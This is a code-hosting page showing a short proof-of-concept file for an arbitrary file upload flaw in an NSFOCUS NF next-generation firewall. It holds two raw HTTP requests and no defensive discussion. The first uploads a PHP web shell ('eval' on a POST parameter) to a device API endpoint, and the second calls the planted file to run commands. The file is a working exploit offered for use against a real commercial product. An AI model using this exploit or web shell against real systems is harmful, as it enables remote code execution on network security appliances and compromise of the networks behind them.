crash.software
Projects
Pull Requests
Issues
Builds
2023Hvv
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY 2023Hvv Files
🤬
main
ROOT /
绿盟 NF 下一代防火墙 任意文件上传漏洞.md
24 lines | ISO-8859-1 | 479 bytes

POC:

POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
Host:
--4803b59d015026999b45993b1245f0ef
Content-Disposition: form-data; name="file"; filename="compose.php"

<?php eval($_POST['cmd']);?>
--4803b59d015026999b45993b1245f0ef--




POST /mail/include/header_main.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
Host:

cmd=phpinfo();
Please wait...
Page is in error, reload to recover